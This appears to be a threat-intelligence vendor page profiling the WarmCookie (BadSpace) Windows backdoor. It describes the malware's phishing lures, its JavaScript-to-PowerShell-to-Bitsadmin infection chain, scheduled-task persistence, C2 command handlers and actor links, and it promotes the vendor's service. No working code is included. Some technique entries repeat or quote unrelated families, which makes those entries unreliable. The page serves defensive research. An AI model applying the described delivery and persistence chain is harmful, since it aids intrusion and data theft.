WarmCookie
WarmCookie, also known as BadSpace, is a Windows backdoor malware family first observed in April 2024 and still actively developed. It is primarily distributed through malspam, phishing, compromised websites, malicious downloads, and malvertising, including lures themed as invoices, job offers, job-related attachments, fake browser updates, and ZIP-delivered malicious JavaScript. Reported infection chains include obfuscated JavaScript launching PowerShell and Bitsadmin to download and execute a WarmCookie DLL. WarmCookie is used to obtain persistent, long-term access to victim environments and can enable remote access, reconnaissance, command execution, file manipulation, screenshot capture, data theft and exfiltration, and deployment of additional payloads. Follow-on payloads directly mentioned in the content include CSharp-Streamer-RAT and Cobalt Strike; ANSSI also states it has been used to deploy Interlock ransomware and may have been used for espionage.
WarmCookie establishes persistence via Windows Task Scheduler, including scheduled tasks created under paths such as %ALLUSERSPROFILE% or %ALLDATA%, and re-executes itself after a delay. Newer variants changed execution syntax from "/p" to "/u" and introduced improved evasion, including randomized "string bank" persistence names derived from legitimate-sounding company names, dual GUID-like mutexes, campaign ID fields, and more legitimate-looking browser user-agent strings. Recent variants add or refine handlers to execute EXE, DLL, and PowerShell payloads, including DLL execution via rundll32.exe with a specified export, and include self-update and persistence-removal functionality. Researchers also reported RC4-key-based clustering of samples and reuse of an SSL certificate on C2 infrastructure, including continued use after expiration; one reported certificate SHA-256 fingerprint is 8c5522c6f2ca22af8db14d404dbf5647a1eba13f2b0f73b0a06d8e304bd89cc.
The malware has been linked in reporting to TA866 through code and functional similarities with the Resident backdoor, and Proofpoint reported TA584 has used WarmCookie as a payload. WarmCookie has also been distributed through CastleLoader/CastleBot-related activity and was included among malware families targeted by Operation Endgame in May 2025. The content states it has targeted organizations across multiple sectors.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
WarmCookie, also known as BadSpace, is a sophisticated malware family that emerged in April 2024, primarily distributed through malspam and malvertising. This malware provides long-term access to compromised environments and facilitates the deployment of additional payloads, such as CSharp-Streamer-RAT and Cobalt Strike.
"...a new backdoor “BadSpace”..."; "...the malware’s alias name WarmCookie."
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesLatrodectus - a sophisticated malware loader first spotted in 2023 used by threat actors like TA578 in phishing campaigns... it is delivered via malicious email attachments.
WarmCookie’s infection chain initiates through email lures—typically invoice-related and job agency themes—that direct victims to malicious JavaScript-hosting servers.
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts, delivered via SendGrid and Amazon Simple Email Service (SES). The emails include unique URLs for each target…”
Execution
8 techniquesWarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Process chain shown includes "Conhost.exe" following execution: "rundll32.exe ... 40FC.exe ... Conhost.exe"
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Warm Cookie - is a backdoor distributed via phishing emails and malicious downloads. It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Persistence
3 techniquesWarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Privilege Escalation
2 techniquesWarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
Stealth
5 techniques"campaign markers embedded as RC4 keys" and code references to decrypted strings (e.g., "StringDecrypt" / "StringDecrypt2")
It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
"New variants now embed two separate GUID-like mutexes, which are used for better control over initialization and synchronization"
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
They both use rundll32.exe for DLL-based execution and task scheduling.
Collection
1 techniqueDanaBot – initially discovered as a modular banking Trojan in 2018... It primarily aims to steal banking credentials, browser data, and personal information.
Command and Control
4 techniquesTA866 previously used unique, detectable C2 user-agent strings (e.g., Mozilla/4.0 (compatible; MSIE 6.0…)), which have since been updated to blend with standard strings like Mozilla/5.0… Firefox/115.0.
Command 0x8: Receives a DLL from C2, assigns it a temporary filename, and executes it. Command 0xA: Similar to Command 0x8 but adds hardcoded parameters, allowing self-updating.
Warm Cookie - is a backdoor... Once active, it enables remote access, data theft, and further malware deployment via a botnet command and controller.
IOCs tracked for this family
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
21 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named as a remote access trojan distributed by CastleLoader.
Previously distributed payload in TA584 activity; specific functionality not described in the provided content.
Previously used malware family in TA584 activity (mentioned historically).
Referenced as a historical payload used by TA584 (no additional details provided in the content).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.